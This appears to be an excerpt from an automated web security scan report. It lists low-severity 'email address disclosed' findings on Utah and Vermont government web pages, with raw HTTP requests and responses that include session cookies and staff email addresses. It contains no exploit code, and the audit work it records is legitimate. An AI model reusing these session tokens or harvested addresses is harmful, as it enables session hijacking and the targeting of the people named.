22.220. http://www.utah.gov/pmn/sitemap/notice/67945.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /pmn/sitemap/notice/67945.html

Issue detail

The following email address was disclosed in the response:

Request

GET /pmn/sitemap/notice/67945.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_01
Set-Cookie: JSESSIONID=62587d63028fa9a37c10611f1005; Path=/pmn
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:22:48 GMT
Content-Length: 12502


<!DOCTYPE HTML>
<html>
   <head>
       <title>Public Meeting Notices</title>
           <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
           <script type='text/javascript' src=
...[SNIP]...
<a href="mailto:Yvonne.Wright@slcgov.com">Yvonne.Wright@slcgov.com</a>
...[SNIP]...

22.221. https://www.vermontjoblink.com/ada  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada

Issue detail

The following email address was disclosed in the response:

Request

GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 158
Content-Type: text/html
Location: https://www.vermontjoblink.com/ada/
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:15:04 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.vermontjoblink.com/ada/">here</a></body>

22.222. https://www.vermontjoblink.com/ada/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/ HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Set-Cookie: TEST=1;path=/
Set-Cookie: SYSTRANLANGUAGE=en;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a>
...[SNIP]...

22.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:06:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

22.227. https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/images/1p.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/images/1p.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif
Last-Modified: Fri, 22 Oct 2010 17:19:52 GMT
Accept-Ranges: bytes
ETag: "8db9756d72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT

GIF89a...................!.......,...........T..;

22.228. https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/images/crop_hump2.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/images/crop_hump2.jpg HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 51151
Content-Type: image/jpeg
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg
Last-Modified: Fri, 22 Oct 2010 17:20:03 GMT
Accept-Ranges: bytes
ETag: "3c172b5dd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT

......JFIF.....,.,.....C....................................................................C............................................................................"..............................
...[SNIP]...

22.229. https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/images/statebullet.png

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/images/statebullet.png HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 5822
Content-Type: image/png
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png
Last-Modified: Fri, 22 Oct 2010 17:20:26 GMT
Accept-Ranges: bytes
ETag: "a8fd16bd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT

.PNG
.
...IHDR...@...@......iq.....sRGB.........bKGD.............    pHYs.................tIME.......%......>IDATx..{k...y........,W\.IS.u3.DR.K....\....V...B...?......QTp..,\..Q...:.RW....a.. 'V.Z.M.
...[SNIP]...

22.230. https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/images/vt_logo.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/customization/Vermont/images/vt_logo.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 2903
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif
Last-Modified: Fri, 22 Oct 2010 17:20:33 GMT
Accept-Ranges: bytes
ETag: "827d306fd72cb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
